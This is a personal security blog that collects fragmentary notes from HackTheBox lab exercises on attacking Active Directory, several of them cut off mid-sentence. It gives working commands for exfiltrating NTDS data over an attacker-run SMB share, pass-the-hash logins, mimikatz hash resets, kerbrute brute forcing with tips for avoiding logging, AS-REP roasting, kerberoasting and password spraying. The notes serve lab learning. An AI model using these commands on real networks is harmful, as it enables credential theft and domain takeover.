Avi's blog

the scenario is written while performing hackthebox blackfield box.  after getting access on a system, see what privileges you have by running command whoami /all or whoami /priv if you see sebackupprivilege and serestoreprivilege then you can proceed the below all steps. these two are most dangerous privileges specially when you are in AD.  creating a share on 10.10.10.14 (our system) so that we can pull out some data from an AD that we compromised. creating a smb server on the following directory /home/ippsec/blackfield/ mkdir smb cd smb sudo smbserver.py -smb2support SendMeYourData $(pwd) or sudo smbserver.py -smb2support -user ippsec -password PleaseSubscribe SendMeYourData $(pwd)   The username and password is your own machine username and password. SendMeYourData  is the share name. once you give enter, it will start listening on 445 Now go to the AD where you get evil-winrm shell. scenario is you compromised the AD. now you want to exfiltrate c:\windows\ntds\ from AD to your own

 C:\Users\Administrator\Desktop>cipher /c root.txt it will tell you that only administrator can decrypt this. but you are nt authority\system. so exit psexec.py  now login with wmiexec.py from your own machine. wmiexec.py -hashes 184fb5e5178480be64824d4cd53b99ee:184fb5e5178480be64824d4cd53b99ee administrator@10.10.10.192 now you are administrator.  now use mimikatz to reset the password of audit2020 account that we had changed using rpcclient.  from own machine: locate mimikatz /home/ippsec/ts/www/mimikatz.exe *Evil-WinRM* PS C:\> upload  /home/ippsec/ts/www/mimikatz.exe   (go to windows temp directory of this remote AD to upload the mimikatz.exe)  uploading to C:\\mimikatz.exe  *Evil-WinRM* PS C:\> mimikatz.exe "lsadump::setntlm /user:Audit2020 /ntlm:600a406c2c1f2062eb9bb227bad654aa"     (this will not work because this is powershell session) do it from psexec session. revise from part 1 how to pass the hash using psexec there is a change that the mimikatz gets dele

extract hashes from memory dump or memory we often use mimikatz. but as mimikatz is exclusively build for windows so we could use pypykatz.  pip3 install pypykatz pypykatz lsa minidump lsass.DMP lsass.DMP is our memory dump.  Avi

https://github.com/BloodHoundAD/BloodHound git clone https://github.com/BloodHoundAD/BloodHound.git now go to BloodHound directory and find sharphound. upload sharphound.exe on the remote AD box. assuming you have already create a smb share to upload this.  https://github.com/BloodHoundAD/BloodHound/releases from the above link, download BloodHound-linux-64.zip. now start neo4j console then start bloodhound ./BloodHound --no-sandbox  assuming you have remote evil-winrm shell on AD box.  *Evil-WinRM* PS ipsec:\> .\SharpHound.exe -c all    (it will create a zip file. you need to upload this zip file on bloodhound on your host machine. you will get the zip file on your host machine smb share directory, this is a little bit confusing because you upload sharphound.exe on the remote AD box, execute it there. the zip file supposed to be there on the remote AD box right? but no, it gets downloaded on your host smb share directory)  https://github.com/fox-it/BloodHound.py git clone https://g

mount -t cifs '//10.10.10.192/profiles$' /mnt First we enumerate share using crackmapexec or smbclient. now we are mounting the share in /mnt for the sake of our easier work.   now lets say we have able to crack support user password. now we want to access the support user profile directory under profiles$. meaning under profiles$ directory there will be a directory called support.  mount -t cifs -o 'username=support,password=#00^BlackKnight' //10.10.10.192/profiles$ /mnt Avi

using rpcclient we can get or enumerate user list in the AD: tried with 1st and 2nd option but it did not work. once we get support user password then it worked.  rpcclient 10.10.10.192  (hit enter for blank password) or rpcclient 10.10.10.192 -U ' '  (null authentication,  hit enter for blank password ) you will get enter but enumdomusers command will not work.  rpcclient -U support 10.10.10.192 (once give enter it will ask for support user password) rpcclient $> enumdomusers Once we have valid one domain users username and password then we can leverage rpcclient to enumerate domain users.  see here, along with users we get users rid. this rid will help to find out users members of how many groups and what are those groups. for example, you want to find out svc-alfresco in how many groups? so note down his rid. rpcclient $> queryusergroups 0x47b this will show a list of group rid that the user member of. now: rpcclient $> querygroup 0x201 rpcclient $> queryuser 0x

   john --wordlist=/usr/share/wordlists/rockyou.txt support_hash    

grep -i  -i will ignore case sensitive  grep -B5 for example we want to see 5 lines before the keyword of krb5asrep. The below command will help.  Say you want to find only email address from a bunch of files: grep -r @gmail.com .   grep -r -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+.[a-zA-Z0-9.-]+\b" .   -r: This option tells grep to search recursively in all files and subdirectories within the specified directory (in this case, the current directory denoted by .  -E: This option enables the use of extended regular expressions, which allows us to use more complex patterns for matching.  -o: This option instructs grep to only output the part of the line that matches the specified pattern. In this case, it will only display the email addresses that are found in the files.  -i: This option makes the search case-insensitive, meaning it will match both uppercase and lowercase letters for the email addresses.  \b: This is a word boundary anchor, which ensures that the email address is

kerbrute tool will give you list of valid users that are part of blackfield domain. Now we want to see only username@domainname field. Then awk command will help. grep Valid command will help to remove the blank lines. We dont want to see @domain part. So -F\@ or -F@ switch will help. Now save this as only username.lst and save this as dom_user.lst  Another example: lets say we only want to extract Administrator username. user: [Administrator] rid: [0x1f4] awk -F'\[' '{print $2}'  now we will see this part Administrator] rid: [0x1f4] awk -F'\[' '{print $2}' | awk -F'\]' '{print $1}'   Now we should see only Administrator.      now lets say we want to see 1st and last part of each line meaning, htb.local\andy and ntlm hash.  cat hashes.out | grep ::: | awk -F: '{print $1":"$4}' the result will be like this:  now we can crack this using hashcat.    

https://github.com/ropnop/kerbrute https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 Download this one.  chmod +x kerbrute_linux_amd64 ./kerbrute_linux_amd64 userenum --dc 10.10.10.192 -d blackfield.local -o valid_users.out allusers.lst This tool will give you list of users from allusers.lst those are a part of blackfield.local domain. allusers.lst is having some usernames in it. using kerbrute tool we will compare the usernames with AD so that we can know how many valid usernames are there in AD.  we can also bruteforce to find out users password: alert: before running this bruteforce command please go through the github page. because if lockout policy and siem tool there then you may get caught. but it is not gonna generate event code 4624, its gonna create a kerberos failure thing which by default not logged. so its a good way to brute force account with potentially just not being seen.  root@kali:~# ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com

 

When pre-auth is enabled then you can also crack the password of users but there is a condition. You need to perform wireshark capture locally to capture the AS-REQ packet. And also require hashcat beta version. Hashcat beta version will give you one such mode that is not available in hashcat normal use exe.  

C:\HTB\hashcat510>hashcat64 -m 18200 -a 0 "encrypted data or hash value"   on linux: hashcat -m 18200 hashes/sauna /usr/share/wordlists/rockyou.txt  or ./hashcat -m 18200 hashes/sauna /usr/share/wordlists/rockyou.txt rules/InsidePro-PasswordsPro.rule   hashes is the directory and sauna is the file where we kept the hash. 

https://www.secureauth.com/labs/open-source-tools/impacket/   C:\>getnpusers.py scrm.local/ -dc-ip 192.168.0.79 -request So what make the account vulnerable?  If you enable the Do not require Kerberos preauthentication just like the above screenshot, then the account will be vulnerable. Get NP Users.py NP means non preauth. This tool will try to harvest non preauth AS-REP responses from the list of given users that we provide. Non preauth means kerberos pre authentication is not required. By enabling this option you are actually disabling this options.    If you enable the Do not require Kerberos preauthentication by giving tick mark on the box, then the above script will return AS-REP encrypted data of that user. Because it will not check timestamp then. Check the username and give back the TGT. Even in wireshark packet capture, in the asrep packet the encrypted data will also be shown. Now hashcat will help to crack further. In AS-REQ and AS-REP the data is encrypted with users

  Kerberos is network based authentication protocol that works based on tickets. Using this protocol client and server authenticate each other in a insecure network. Authentication is done by the KDC-key distribution center (which is a domain controller). KDC is trusted by both client and server. If kerberos is not available then windows back to NTLMv2 algorithm. Kerberos works based on hostname. If you use ip it will also go back to ntlm again. Kerberos use shared secret which is NTLM hash, this is used for encryption and decryption.  Before you authenticate yourself to any server you first need a TGT - ticket granting ticket and you will get this from only KDC when you type username and password (actually the password at the time of login).    1. Client i.e. Tim: Hi KDC, I need a TGT from you because i need to authenticate myself with other server for availing some special service. Using this TGT i will take service ticket TGS from you again. Later i will show the service ticket TG

xz -d flag.xz bzip2 -d flag.bz gunzip -d flag.gz tar xvf flag.tar    Avi

https://github.com/carlospolop/autoVolatility git clone https://github.com/carlospolop/autoVolatility.git python autoVolatility/autoVolatility.py -f memdump.mem -d output_directory   or python2 autoVolatility/autoVolatility.py -f memdump.mem -d output_directory   Now wait for sometimes to complete the tasks. 

In order to crack we need SAM and system reg files.  samdump2 system SAM   copy the second part of the hash. use either crackstation.net or hashcat.  hashcat -a 0 -m 1000 <ntlm hash> /usr/share/wordlists/crackstation_real.txt   Avi 

  john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast  $23$ hashcat -m 13100 -a 0 "encrypted tgs data or hash" Avi

SPN - service principle name. Services (mysql or http) that supports kerberos authentication are require to have a SPN associated with it in order to point users to the appropriate resource for connection. Its a unique identifier of a service instance.  SPN tells that which service is mapped with which account. Further meaning, what are the service account are there that are mapped with corresponding service account. i.e. http service is mapped with SAccount. MSSQLSvc service is mapped with Sqlsvc account. When we issue the below command then we are seeing an encrypted data.  GetUserSPNs.py -request -dc-ip 10.6.0.2 htb.local/JSmith:passw0rd For example our service account are SAccount or sqlsvc. They are the user account remember. The data has been encrypted with corresponding service account ntlm hash password. If we decrypt the data then we shall get the password of that corresponding service account. This is the TGS that is encrypted with NTLM hash of the service account (which is S

crackmapexec smb 10.6.0.2 -u 'SAccount' -p /usr/share/wordlists/rockyou.txt This does the same job as hydra but this tool is more faster than hydra.  you can use crackmapexec or cme interchangeably. installation of crackmapexec: https://github.com/byt3bl33d3r/CrackMapExec sudo python3 -m pip install pipx sudo pipx ensurepath or pipx ensurepath  sudo apt-get install python3-venv pipx install crackmapexec  once it is installed now type cme -h you can also enumerate shares using cme - crackmapexec. smbclient will not tell you whether you have read or write access on the share folder or not. crackmapexec will tell you that. smbmap will also tell you that.  lets see how we can enumerate shares using cme: cme smb 10.10.10.192 or cme smb 10.10.10.192 --shares or cme smb 10.10.10.192 --shares -u ''  (using two single quote separately) or cme smb 10.10.10.192 --shares -u '' -p ''   (using two single quote separately) or cme smb 10.10.10.192 --shares -u 'Pleas